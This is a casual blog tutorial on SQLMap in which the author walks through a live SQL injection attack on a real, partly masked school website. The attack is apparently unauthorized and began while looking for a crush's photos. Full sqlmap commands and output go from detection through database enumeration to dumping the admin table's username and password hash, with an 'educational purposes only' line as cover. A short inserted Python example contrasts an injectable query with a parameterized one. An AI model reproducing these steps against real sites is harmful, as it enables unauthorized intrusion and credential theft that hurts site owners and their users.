Hello Guys!
In this article, I will be introducing a powerful database takeover tool called SQLMap.
Now let’s get straight to the point.


It is a tool designed to satisfy all your needs related to SQL injection. It can detect and bypass a WAF (Web Application Firewall), it can detect the database type (MSSQL, Oracle, PostgreSQL, etc.) and version, it can perform different kinds of injections (blind, error-based, time-based, etc.), it supports proxies, multiple threads for faster enumeration, etc. etc. etc.
In simple words, it's the best automatic SQLi tool so far.
Just give it an injection point and it will do everything itself.
Excited? Me too, man, let's do this.

Spotting A Potential Injection Point

I was just checking the school website of my crush to see if there were any pictures of her.
Aaaand I found one and clicked on it, but then I accidentally looked at the address bar of my browser and I saw this:


Sorry, I can’t let you see the complete URL, and yeah, this article is for educational purposes only.
?id=46, this thing…different values of id pull different data out of the database. And as we learned in our previous article, if a webpage uses SQL queries to generate results, it may generate anything that a user *coughs* a hacker wants.
So ummm, here is my target webpage “******.**/udml/photo_gallery.php?id=6”, or you may call it an injection point (as a hacker can insert his own SQL queries here).
Now let’s try to breach into the database with SQLMap.
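To make the injection point concrete, here is an added example (not from the original post) that mimics a photo-gallery lookup by id with Python's sqlite3: one function glues the id value into the SQL text the way an injectable photo_gallery.php would, the other validates the value and binds it as a parameter. The table name pg_images is borrowed from the table listing later in the post and the rows are constructed; the point is to see what the "dynamic" and "injectable" checks SQLMap runs actually observe, and why the hardened version gives them nothing to work with.

```python
import sqlite3

# Constructed stand-in for the photo_gallery.php?id=N page: an in-memory table
# with a few made-up rows (only the table name pg_images comes from the post).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE pg_images (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO pg_images VALUES (?, ?)",
                     [(6, "Sports day"), (46, "Annual function"), (47, "Science fair")])
    return conn

def get_photo_vulnerable(conn, raw_id):
    """The injectable pattern: whatever follows ?id= becomes part of the SQL text."""
    sql = "SELECT id, title FROM pg_images WHERE id = " + raw_id
    return conn.execute(sql).fetchall()

def get_photo_safe(conn, raw_id):
    """Hardened lookup: reject anything that is not an integer, then bind the value."""
    try:
        photo_id = int(raw_id)
    except ValueError:
        return []                      # "no such photo", never a database error
    return conn.execute("SELECT id, title FROM pg_images WHERE id = ?", (photo_id,)).fetchall()

def triggers_db_error(conn, raw_id):
    """True when the value makes the vulnerable query fail to parse (the error-based signal)."""
    try:
        get_photo_vulnerable(conn, raw_id)
    except sqlite3.Error:
        return True
    return False

if __name__ == "__main__":
    conn = make_db()
    # "dynamic" parameter: different ids return different content
    print(get_photo_vulnerable(conn, "6"), get_photo_vulnerable(conn, "46"))
    # boolean-based signal: a true condition keeps the row, a false one drops it
    print(get_photo_vulnerable(conn, "6 AND 1=1"), get_photo_vulnerable(conn, "6 AND 1=2"))
    # an always-true condition leaks every row
    print(get_photo_vulnerable(conn, "6 OR 1=1"))
    # a stray quote produces a database error
    print(triggers_db_error(conn, "6'"))
    # the hardened version treats every one of these as "no such photo"
    print(get_photo_safe(conn, "6"), get_photo_safe(conn, "6 OR 1=1"), get_photo_safe(conn, "6'"))
```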

Injecting With SQLMap

Let’s open a terminal and type:

sqlmap -u www.******.**/photo_gallery.php?id=6

Here sqlmap invokes SQLMap, -u stands for URL, and www.******.**/photo_gallery.php?id=6 is the URL itself.
Ok, so I entered this command and I got this:

[email protected]:~# sqlmap -u www.******.**photo_gallery.php?id=6
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-201701080a89}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 15:41:50

[15:41:55] [INFO] testing connection to the target URL
[15:42:00] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
[15:42:01] [INFO] testing if the target URL is stable
[15:42:01] [INFO] target URL is stable
[15:42:01] [INFO] testing if GET parameter 'id' is dynamic
[15:42:02] [INFO] confirming that GET parameter 'id' is dynamic
[15:42:03] [INFO] GET parameter 'id' is dynamic
[15:42:04] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[15:42:04] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to XSS attacks
[15:42:04] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads 
for the remaining tests? [Y/n]

So SQLMap checked that the URL is reachable, then it checked whether the target is protected by a WAF/IPS/IDS, then it checked whether the parameter id is dynamic, which means whether changing its value changes the content of the page.
Then it told me that the parameter might be vulnerable to SQL injection, and it guessed the Database Management System too, i.e. MySQL.
Now in the last line, it’s asking me whether it should skip the test payloads meant for other DBMSes. Yes please: it has already guessed the DBMS, so we don’t need it to test for the others.
And have you noticed that Y is in uppercase (here [Y/n]) when it asks you to choose an option?
Well, the recommended option is always shown in uppercase, and you should always pick the recommended option if you don’t know what you are doing.
So I entered Y and it went on to test the injection and check the version of the DBMS (the version of MySQL).
After a few minutes, I got this:

GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]

Gotcha! Now it is confirmed that it’s vulnerable to SQL injection, so it’s time to stop testing (I entered N) and breach into the databases.
Hmm, so now that we know SQL injection is possible, we can tell SQLMap to retrieve/enumerate the databases.
For this I will pass the following command to the terminal:

sqlmap -u www.******.**/photo_gallery.php?id=6 --dbs

Where --dbs tells SQLMap to retrieve the database names.
This command got me here:

[15:56:33] [INFO] fetching database names
[15:56:38] [INFO] the SQL query used returns 2 entries
[15:56:38] [INFO] retrieved: information_schema
[15:56:40] [INFO] retrieved: udmlacin_db
available databases [2]:
[*] information_schema
[*] udmlacin_db

Hmm, so there are two databases (each marked with a [*] symbol), so which one should we breach?
Well, the first database is information_schema, and this is a database you are going to find in nearly every DBMS. It stores read-only metadata about the other databases (their tables, columns and so on).
So this is not the interesting stuff.
The next database is udmlacin_db, which is probably the core database of the site, so that is the one we have to breach into.
For that we will have to find the tables present in the database udmlacin_db, and for that I will enter the following command in the terminal:

sqlmap -u www.******.**/photo_gallery.php?id=6 --tables -D udmlacin_db

Where -D defines the target database.
And this command will show all the tables present in the target database like this,

Database: udmlacin_db
[14 tables]
| admin                |
| careers              |
| download_categories  |
| downloads            |
| emailenq             |
| knowledge_categories |
| knowledges           |
| ks_relations         |
| news                 |
| notice_categories    |
| notices              |
| pg_category          |
| pg_images            |
| subscriptions        |

Hmmm, now what? I don’t know, it depends on what kind of information you want from the database.
In my case, I am interested in the table named admin because it may contain credentials (username, password, etc.) with which we could log in to the admin panel of the website and make changes to it.
Hmmm, so let’s retrieve the columns present in the table admin.
For this I will enter:

sqlmap -u www.******.**/photo_gallery.php?id=6 --columns -D udmlacin_db -T admin

Where the -T option is used to supply the target table name.
Aaaand SQLMap retrieves the columns:

Database: udmlacin_db
Table: admin
[3 columns]
| Column   | Type         |
| id       | int(11)      |
| pass     | varchar(255) |
| username | varchar(25)  |

Now let’s dump this table to see what’s inside of it.
For this I will supply the following command:

sqlmap -u www.******.**/photo_gallery.php?id=6 --dump -D udmlacin_db -T admin

In no time I got the results:

| id | pass                             | username |
| 1  | 1FF98CA167D78C6821403E99625007FE | admin    |

Whoa!! That’s a strong password!!
Nope…it’s a hash!
Well, yeah, it is the password, but it is stored as a hash rather than in plain text, so you need to crack the hash to recover the real password.
We are going to talk about encryption and hashes soon, but for now I want you to get familiar with SQLMap.
Comment down if you don’t understand something.
Till then, keep reading, keep learning.
